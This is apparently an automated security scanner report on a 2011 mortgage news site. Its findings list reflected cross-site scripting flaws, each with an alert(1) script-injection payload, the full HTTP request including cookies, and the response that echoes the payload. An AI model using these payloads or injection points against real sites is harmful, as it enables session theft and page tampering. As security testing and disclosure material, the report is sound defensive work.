<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http: ...[SNIP]... ernate" type="application/rss+xml" title=" Foreclosures down 31% in state - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/01/25/foreclosures-down-31-in-state/41514/?39195\"><script>alert(1)</script>7289003fdd6=1feed/" /> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70fcf"><script>alert(1)</script>62ea07ed0d1 was submitted in the REST URL parameter 5. This input was echoed as 70fcf\"><script>alert(1)</script>62ea07ed0d1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/01/26/7900-o-c-homes-seized-in-2010/4153270fcf"><script>alert(1)</script>62ea07ed0d1/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:09:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:09:54 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62691
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/01/26/7900-o-c-homes-seized-in-2010/4153270fcf\"><script>alert(1)</script>62ea07ed0d1/feed/" /> ...[SNIP]...
1.370. http://mortgage.ocregister.com/2011/01/26/7900-o-c-homes-seized-in-2010/41532/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://mortgage.ocregister.com
Path: /2011/01/26/7900-o-c-homes-seized-in-2010/41532/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7f46"><script>alert(1)</script>4549895a33a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a7f46\"><script>alert(1)</script>4549895a33a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/01/26/7900-o-c-homes-seized-in-2010/41532/?a7f46"><script>alert(1)</script>4549895a33a=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:09:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Link: <http://mortgage.ocregister.com/?p=41532>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 115806
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http: ...[SNIP]... rnate" type="application/rss+xml" title=" 7,900 O.C. homes seized in 2010 - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/01/26/7900-o-c-homes-seized-in-2010/41532/?a7f46\"><script>alert(1)</script>4549895a33a=1feed/" /> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4962"><script>alert(1)</script>87890681c86 was submitted in the REST URL parameter 5. This input was echoed as e4962\"><script>alert(1)</script>87890681c86 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/01/29/3-5-million-irvine-foreclosure-hits-market/41590e4962"><script>alert(1)</script>87890681c86/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:09:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:09:38 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62704
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... ="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/01/29/3-5-million-irvine-foreclosure-hits-market/41590e4962\"><script>alert(1)</script>87890681c86/feed/" /> ...[SNIP]...
1.372. http://mortgage.ocregister.com/2011/01/29/3-5-million-irvine-foreclosure-hits-market/41590/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a36eb"><script>alert(1)</script>60713eca42a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a36eb\"><script>alert(1)</script>60713eca42a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/01/29/3-5-million-irvine-foreclosure-hits-market/41590/?a36eb"><script>alert(1)</script>60713eca42a=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:09:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Link: <http://mortgage.ocregister.com/?p=41590>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 83515
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http: ...[SNIP]... rss+xml" title=" $3.5 million Irvine foreclosure hits market - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/01/29/3-5-million-irvine-foreclosure-hits-market/41590/?a36eb\"><script>alert(1)</script>60713eca42a=1feed/" /> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5367a"><script>alert(1)</script>8c4f91db03b was submitted in the REST URL parameter 5. This input was echoed as 5367a\"><script>alert(1)</script>8c4f91db03b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/01/29/couple-might-be-better-off-with-short-sale/415025367a"><script>alert(1)</script>8c4f91db03b/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:09:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:09:50 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62704
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... ="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/01/29/couple-might-be-better-off-with-short-sale/415025367a\"><script>alert(1)</script>8c4f91db03b/feed/" /> ...[SNIP]...
1.374. http://mortgage.ocregister.com/2011/01/29/couple-might-be-better-off-with-short-sale/41502/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c45d"><script>alert(1)</script>8eb8cd1b964 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6c45d\"><script>alert(1)</script>8eb8cd1b964 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/01/29/couple-might-be-better-off-with-short-sale/41502/?6c45d"><script>alert(1)</script>8eb8cd1b964=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:09:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Link: <http://mortgage.ocregister.com/?p=41502>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 77827
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http: ...[SNIP]... /rss+xml" title=" Couple might be better off with short sale - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/01/29/couple-might-be-better-off-with-short-sale/41502/?6c45d\"><script>alert(1)</script>8eb8cd1b964=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6be24"><script>alert(1)</script>6d101414c29 was submitted in the REST URL parameter 1. This input was echoed as 6be24\"><script>alert(1)</script>6d101414c29 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /20116be24"><script>alert(1)</script>6d101414c29/02/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:08:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:08:51 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62651
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/20116be24\"><script>alert(1)</script>6d101414c29/02/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2022c"><script>alert(1)</script>df2f3673541 was submitted in the REST URL parameter 2. This input was echoed as 2022c\"><script>alert(1)</script>df2f3673541 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/022022c"><script>alert(1)</script>df2f3673541/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:08:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:08:57 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62652
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/022022c\"><script>alert(1)</script>df2f3673541/feed/" /> ...[SNIP]...
1.377. http://mortgage.ocregister.com/2011/02/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://mortgage.ocregister.com
Path: /2011/02/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be6d4"><script>alert(1)</script>10654d20381 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as be6d4\"><script>alert(1)</script>10654d20381 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/?be6d4"><script>alert(1)</script>10654d20381=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:08:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 68451
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2011 February - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/02/?be6d4\"><script>alert(1)</script>10654d20381=1feed/" /> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 848f3"><script>alert(1)</script>73c38926bd3 was submitted in the REST URL parameter 5. This input was echoed as 848f3\"><script>alert(1)</script>73c38926bd3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/02/predatory-lending-suit-settles-for-6-5-million/41668848f3"><script>alert(1)</script>73c38926bd3/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:09:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:09:12 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62707
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... ternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/02/02/predatory-lending-suit-settles-for-6-5-million/41668848f3\"><script>alert(1)</script>73c38926bd3/feed/" /> ...[SNIP]...
1.379. http://mortgage.ocregister.com/2011/02/02/predatory-lending-suit-settles-for-6-5-million/41668/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 231b3"><script>alert(1)</script>bb110f17cc5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 231b3\"><script>alert(1)</script>bb110f17cc5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/02/predatory-lending-suit-settles-for-6-5-million/41668/?231b3"><script>alert(1)</script>bb110f17cc5=1 HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:08:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Link: <http://mortgage.ocregister.com/?p=41668>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 83614
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http: ...[SNIP]... title=" Predatory lending suit settles for $6.5 million - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/02/02/predatory-lending-suit-settles-for-6-5-million/41668/?231b3\"><script>alert(1)</script>bb110f17cc5=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b00fb"><script>alert(1)</script>98a4af95827 was submitted in the REST URL parameter 1. This input was echoed as b00fb\"><script>alert(1)</script>98a4af95827 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /b00fb"><script>alert(1)</script>98a4af95827?t=1759807488 HTTP/1.1
Host: mortgage.ocregister.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:02:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:02:08 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 62650
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/b00fb\"><script>alert(1)</script>98a4af95827?t=1759807488feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a6c3"><script>alert(1)</script>30983565075 was submitted in the REST URL parameter 1. This input was echoed as 9a6c3\"><script>alert(1)</script>30983565075 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /css9a6c3"><script>alert(1)</script>30983565075/print.css HTTP/1.1
Host: mortgage.ocregister.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:02:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:02:12 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 62639
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/css9a6c3\"><script>alert(1)</script>30983565075/print.cssfeed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6883"><script>alert(1)</script>aee79722e35 was submitted in the REST URL parameter 2. This input was echoed as c6883\"><script>alert(1)</script>aee79722e35 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /css/print.cssc6883"><script>alert(1)</script>aee79722e35 HTTP/1.1
Host: mortgage.ocregister.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:02:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:02:22 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 62649
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/css/print.cssc6883\"><script>alert(1)</script>aee79722e35feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a71cd"><script>alert(1)</script>1f35e8c0ea2 was submitted in the REST URL parameter 1. This input was echoed as a71cd\"><script>alert(1)</script>1f35e8c0ea2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /feeda71cd"><script>alert(1)</script>1f35e8c0ea2/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 16:23:25 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 16:23:26 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62581
